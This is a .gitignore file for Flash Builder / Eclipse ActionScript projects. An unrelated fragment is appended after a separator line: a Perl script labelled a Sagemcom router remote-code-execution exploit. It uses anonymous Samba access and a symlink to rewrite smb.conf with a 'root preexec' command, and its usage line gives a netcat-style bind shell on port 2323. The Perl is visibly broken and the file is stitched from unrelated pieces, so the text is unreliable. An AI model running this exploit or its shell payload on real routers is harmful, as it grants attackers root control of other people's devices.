# Build and Release Folders
bin-debug/
bin-release/
[Oo]bj/
[Bb]in/

# Other files and folders
.settings/

# Executables
*.swf
*.air
*.ipa
*.apk

# Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`
# should NOT be excluded as they contain compiler settings and other important
# information for Eclipse / Flash Builder.
____________________________________________________________________________________
args : host cmd (i.e. 127.0.0.1 box -l -p 2323 -e / bin/sh


SAGEMCOM RCE 0da_y
($h,@c)=@argv;$s='z/etc/samba/smb.conf';
sub c{$_="smbclient -U \"\"//$h/sagemcom_storage\"\" -c\"@_\"";'$_'}c(symlink /z');
c("get $s$h");open($f,">>$h);
print$f "root preexec = @c\n";
close($f);
c("put $h$s");
c(ls);






